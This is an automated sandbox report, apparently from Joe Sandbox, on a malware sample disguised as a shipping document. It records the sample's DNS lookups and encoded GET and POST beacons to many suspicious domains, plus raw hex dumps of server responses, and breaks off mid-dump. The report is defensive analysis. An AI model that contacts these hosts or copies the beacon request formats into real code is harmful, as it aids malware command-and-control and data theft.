                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeDNS query: www.hasthosting.xyz
                Source: Joe Sandbox ViewIP Address: 45.33.6.223 45.33.6.223
                Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                Source: Joe Sandbox ViewASN Name: WILDCARD-ASWildcardUKLimitedGB WILDCARD-ASWildcardUKLimitedGB
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A22404 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00A22404
                Source: C:\Windows\SysWOW64\AtBroker.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3350000[1].zipJump to behavior
                Source: global trafficHTTP traffic detected: GET /s7rc/?Vta=nFypuDtholF&mFptYb=6DRnIJ+Fte42OB/5XetGdeOJ+lOhphxOvMg5DpP/yyjJNxXWq01mRUwFVex1iRDtTe4NkeQHEQ9jZsZ13oeWt1010btNzgPMSC+IqSdDnCJo+Vo0XkUS70+rul7v HTTP/1.1Host: www.jllllbx.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /2021/sqlite-dll-win32-x86-3350000.zip HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /fu91/?mFptYb=HVzlbrdNsUKwRMyAkWW6+eYcwGansP/WUf8DIHIYxdtxD6ajZVqGQ6r7bYdvsg7HhzGwO4nUubyDeivvZ5uUZnZTjM5UwBrFB6CCixihWT7Na0ffLjed1FEIbDhA&Vta=nFypuDtholF HTTP/1.1Host: www.college-help.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /usv6/?mFptYb=TgDODAIJaOl5jtT4JVTY+PvwOqFRmlbaFilQ+MjMe2d3S0GP4FMVqMWCvgzOI+CNdjxuqTDbs8bnZHFVmt5Iw+xv7nFgog653DC3dJxayAsmz1wZ3Pvz+hOxoHiw&Vta=nFypuDtholF HTTP/1.1Host: www.binacamasala.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /xprp/?mFptYb=VtQLa3osnF7akoTJd4GrPXLEITF5D20FSH4Ha68GLubc/osER9eykAEgUNChz5U0fhCRjr86/53OttkDG1sp/tuoYRmADukdDHAerdJ8reArgzR0s5PIA9lSC6/k&Vta=nFypuDtholF HTTP/1.1Host: www.marketplacer.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /k47i/?Vta=nFypuDtholF&mFptYb=9kxEYcPO0Qe31MjAFjIcWOncsH25cFhJfOSVnSYcFCRu8P8I16bnvFurvQhgIE0Ki89nSiSy+a0RlMSh3+VYEZE5/A1AoTNj5T9S7+51vpkFoip5Twnd4WVIrXl3 HTTP/1.1Host: www.energyparks.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /9jdk/?mFptYb=WubzzLgyg7H8FuUk5jz2rAc/vuKAZBsVZD6HlZkF1Lv4/cTJ30fLMnj/fJn75AU89YfOY1B4b6fbf9/30+RUdxRnQcqHHPG8fsTR2djr0+RxMWff6QI0kTzUoO97&Vta=nFypuDtholF HTTP/1.1Host: www.yvrkp.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /brrb/?mFptYb=Pyc5xCH2FNTrUJIJc2J3jfwJvYyqOHlrloocc6vOBweawvT0T5Z/uibAsKRSCDSof6T5ol8OWeU6iNzlygZ3OH11Snb2up2hISFSOV0LFhqb+gPNdrhH/8C3bcPF&Vta=nFypuDtholF HTTP/1.1Host: www.flikka.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /i4bc/?mFptYb=P7cuULF9RNNpbZDPqKeYgjgLveMcAQaoAqjHQXQRXIOUhYGrthov/zoo0UFBwEOwFncKEQzaM8iNIdWXCLam6BQfA1/n7ZwKXwFy7wLA2+dkqm2zT4ZxPQ5AZvg9&Vta=nFypuDtholF HTTP/1.1Host: www.ladylawher.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /c1ti/?Vta=nFypuDtholF&mFptYb=UWVJg+rBkYQ16c/k/Y1W1sgQfFqH6LNVaa0x99kOYGF7jBYWQyWqo55Eiz0L22BflNyMA4mVt2TvQrx7EMMmoG9cjujHDm+244I0l/r76jr6gTXXvUDzyyGCpqIK HTTP/1.1Host: www.primeproperty.propertyAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /usop/?mFptYb=3GbX3siKa3fb4xoywmO7dLt2gtHeawz6Sbk2xDjabsziN9g8eu79XBc6hQhNCIiJycOeh1EqhE8oaarBESMUTzpbIdTTfy1FzFAf98MVDEsTj+MFe4tIzu4mcpDK&Vta=nFypuDtholF HTTP/1.1Host: www.kghjkx.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /cymd/?mFptYb=SQRZB1HP1/e+i1vXkx65XVrDeSNNnXwFTHYuRC8KH5mDKLD+AhmaLKzef3QT7SVce+tzzUZ1GVC2U2YQK5wN3xroRLUyaPMbLSFxR1aJqBACZHGGUwWsqj7Ua713&Vta=nFypuDtholF HTTP/1.1Host: www.iuyi542.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /1i1f/?mFptYb=dQYajm//Sx1stwXHfz91EBXSzFfr0PyC8xP2ywW2sRY4KNcSndLg20S7F1cIbOwwYrPcKp2sut8M/zk+pKvqB0TIHTxz9Wrof9/BUM8Hdiu6WBCEYXAcnBVSoJf5&Vta=nFypuDtholF HTTP/1.1Host: www.neg21.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /m6se/?Vta=nFypuDtholF&mFptYb=tpLSjTwEMN9ZKyp9qVSTFKrjCn9ygWFWt49InxX861XvXeuMycl5+MP/OGAzrS8FX3YfTT6PzpVF+4Zez3QIzOzSaqsrWwxbsC4SLAepSA8UeSOwbSX7uDAGPo/m HTTP/1.1Host: www.digitaladpro.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /y0sc/?mFptYb=tJdq8Dqw4hWr1P6qEoxHD8OlFm+HKuZ69MCgVLcAx6ZVjDjmpjdFVs/kycs0W1S/0p2sAvBc0lWbLbeb6h4QLTxDUgZUmiCBrM9D9onPOIUOQ3sXksUDVUExaBXH&Vta=nFypuDtholF HTTP/1.1Host: www.loginov.enterprisesAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /1bs4/?Vta=nFypuDtholF&mFptYb=NHlL/20Wj3mxTDCCV6AphceXnl/MtZ4Wk+fSFhy0eU4XSufIixCpoBi/gorAC+VzK2LBCRkbZWFQo0n9IQJ7RFp7WJwc0YsNtE+R3Mg/2HoitvY+uCvmluoRVqvz HTTP/1.1Host: www.wcp95.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /04fb/?mFptYb=EDSq5eKeQ/yn+NstHLyKrItwi72t2/2aV0X8lTwCWtszw4+D6CyS+H/PrcNES324cNMrQPmMtrZnBxvMQyG2MZhT0iJG1CcvdKppxy///uoLHwLjuGAXtCom68+z&Vta=nFypuDtholF HTTP/1.1Host: www.hasthosting.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.jllllbx.top
                Source: global trafficDNS traffic detected: DNS query: www.sqlite.org
                Source: global trafficDNS traffic detected: DNS query: www.college-help.info
                Source: global trafficDNS traffic detected: DNS query: www.binacamasala.com
                Source: global trafficDNS traffic detected: DNS query: www.marketplacer.top
                Source: global trafficDNS traffic detected: DNS query: www.energyparks.net
                Source: global trafficDNS traffic detected: DNS query: www.yvrkp.top
                Source: global trafficDNS traffic detected: DNS query: www.flikka.site
                Source: global trafficDNS traffic detected: DNS query: www.ladylawher.shop
                Source: global trafficDNS traffic detected: DNS query: www.primeproperty.property
                Source: global trafficDNS traffic detected: DNS query: www.kghjkx.xyz
                Source: global trafficDNS traffic detected: DNS query: www.iuyi542.xyz
                Source: global trafficDNS traffic detected: DNS query: www.neg21.top
                Source: global trafficDNS traffic detected: DNS query: www.digitaladpro.shop
                Source: global trafficDNS traffic detected: DNS query: www.loginov.enterprises
                Source: global trafficDNS traffic detected: DNS query: www.wcp95.top
                Source: global trafficDNS traffic detected: DNS query: www.hasthosting.xyz
                Source: unknownHTTP traffic detected: POST /fu91/ HTTP/1.1Host: www.college-help.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: http://www.college-help.infoContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeContent-Length: 2163Referer: http://www.college-help.info/fu91/User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36Data Raw: 6d 46 70 74 59 62 3d 4b 58 62 46 59 64 78 42 76 41 48 48 50 4c 53 67 6f 46 43 4b 33 37 49 50 78 45 47 35 69 4a 6e 38 59 4f 51 33 42 6d 51 74 67 49 30 55 56 64 4c 71 63 69 79 35 5a 35 32 4d 58 4c 5a 46 73 7a 6a 7a 75 69 2b 63 4c 61 62 6c 73 5a 65 68 57 51 37 31 4e 37 75 49 4d 42 41 6a 30 64 74 52 30 79 69 34 45 72 43 77 70 79 66 66 54 42 6e 6b 56 30 6e 5a 4d 6c 2b 68 32 33 77 78 66 32 74 4e 65 44 65 43 4a 61 57 56 47 6d 4e 47 57 37 53 38 4d 6d 73 2b 50 35 33 2f 38 53 59 62 47 4b 47 33 65 48 59 68 68 30 54 4a 48 46 79 70 78 36 41 54 47 36 72 7a 71 2b 48 34 39 2b 4b 63 5a 61 37 57 4f 7a 43 45 48 43 33 77 4b 73 58 48 66 4d 33 6b 6f 2f 4e 71 66 57 31 74 61 76 6a 76 5a 69 48 34 6b 41 31 6a 75 69 45 78 4e 51 33 48 6c 50 35 35 53 68 71 76 53 49 54 78 39 78 49 41 35 6a 47 36 32 68 6d 61 69 79 78 58 66 62 4f 63 76 6f 74 65 68 36 75 78 64 58 2f 39 44 52 64 30 77 47 32 76 73 37 6e 53 69 37 5a 4a 75 31 59 5a 4f 2b 42 6c 4f 48 52 69 73 39 69 50 33 59 4c 67 51 53 76 75 4a 43 74 4e 6f 35 44 45 54 5a 45 38 35 62 34 67 63 70 64 49 6f 44 48 68 33 2f 53 75 6a 73 67 53 2f 6f 7a 35 6e 50 31 32 48 4e 33 6f 65 4a 71 71 6d 5a 4c 5a 72 62 35 66 4f 74 77 59 65 65 56 7a 45 41 73 77 57 55 4d 55 7a 58 51 79 2b 53 4b 6d 42 75 57 6d 4a 49 45 67 56 64 50 4f 72 43 2b 46 53 35 4e 4c 2f 66 75 4c 72 49 78 35 69 6a 32 56 37 6d 78 2b 79 71 65 64 75 59 79 78 56 2b 37 64 77 37 31 54 44 74 6b 77 55 4c 54 76 35 4a 6e 79 4d 32 35 6b 6c 35 6c 59 66 43 72 36 4a 49 4f 73 44 35 64 46 42 52 6c 6e 42 38 56 56 74 2f 6b 50 39 45 76 77 54 46 66 72 6d 4c 37 2b 65 66 34 59 70 50 54 75 65 34 42 6a 7a 41 5a 68 66 51 42 62 51 65 52 42 59 43 47 31 42 44 7a 78 70 37 33 42 38 70 6e 43 51 6c 43 46 32 54 30 49 68 61 47 65 56 79 75 50 44 78 36 61 63 48 61 79 4f 53 75 6b 52 48 63 4f 43 66 63 50 62 49 56 65 42 66 30 30 58 56 66 6e 2b 35 4e 59 48 30 6c 4b 44 43 32 5a 35 32 70 4a 43 76 6f 33 66 2f 36 6d 50 52 31 39 36 4c 37 4b 64 41 59 77 79 64 4f 4e 2b 32 44 55 57 47 7a 66 76 6c 70 76 6d 52 30 77 2f 32 79 47 6e 52 52 4e 69 6e 76 34 55 38 65 62 4a 31 43 5a 36 68 78 68 4d 6e 39 72 56 6d 67 41 71 37 67 70 6b 4d 4f 74 32 53 4e 65 6f 35 79 70 69 44 75 39 2b 2b 44 41 52 4d 46 2f 78 79 42 57 57 54 31 6d 71 75 37 35 58 69 76 66 38 55 36 45 4b 6e 33 4b 5a 38 63 52 51 57 6d 45 6d 38 72 49 51 4e 66 72 6e 74 78 49 4d 63 35 63 4c 63 57 6a 47 75 62 38 45 68 73 37 7a 4d 51 61 37 42 57 35 6c 37 73 36 69 2b 66 6f 37 43 41 4c 6e 4
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 09:50:23 GMTServer: ApacheLast-Modified: Wed, 06 Nov 2024 18:10:13 GMTETag: "49d-626426de29b28"Accept-Ranges: bytesContent-Length: 1181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 28 30 2c 30 2c 30 2c 31 29 20 31 30 30 25 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 31 38 70 78 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 31 30 32 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 38 70 78 20 32 31 70 78 20 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 30 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 3a 37 32 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 34 70 78 20 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 0d 0a 7d 0d 0a 2e 6d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 3a 32 34 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 09:50:26 GMTServer: ApacheLast-Modified: Wed, 06 Nov 2024 18:10:13 GMTETag: "49d-626426de29b28"Accept-Ranges: bytesContent-Length: 1181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 28 30 2c 30 2c 30 2c 31 29 20 31 30 30 25 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 31 38 70 78 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 31 30 32 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 38 70 78 20 32 31 70 78 20 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 30 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 3a 37 32 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 34 70 78 20 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 0d 0a 7d 0d 0a 2e 6d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 3a 32 34 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 09:50:28 GMTServer: ApacheLast-Modified: Wed, 06 Nov 2024 18:10:13 GMTETag: "49d-626426de29b28"Accept-Ranges: bytesContent-Length: 1181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 28 30 2c 30 2c 30 2c 31 29 20 31 30 30 25 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6e 